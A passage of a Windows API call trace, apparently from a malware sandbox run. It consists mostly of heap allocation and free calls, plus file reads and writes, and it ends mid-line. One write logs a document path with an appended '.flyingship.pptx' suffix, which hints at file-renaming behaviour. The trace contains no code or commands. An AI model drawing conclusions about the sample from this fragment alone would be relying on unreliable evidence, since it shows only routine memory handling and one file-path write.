[0173.857] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0173.857] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.857] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.857] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0173.857] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x136b, lpOverlapped=0x0) returned 1 [0173.857] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0173.857] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x136b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.857] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0173.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.flyingship.pptx\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0173.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.flyingship.pptx\r\n", cchWideChar=72, lpMultiByteStr=0x9aa4f8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.flyingship.pptx\r\n", lpUsedDefaultChar=0x0) returned 72 [0173.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0173.858] WriteFile (in: hFile=0x120, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x47, lpOverlapped=0x0) returned 1 [0173.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0173.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.858] CloseHandle (hObject=0x120) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0173.860] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0173.860] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.861] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0173.861] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.861] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0173.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0173.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.861] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0173.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0173.862] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0173.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0173.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0173.866] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.867] HeapFree (in: 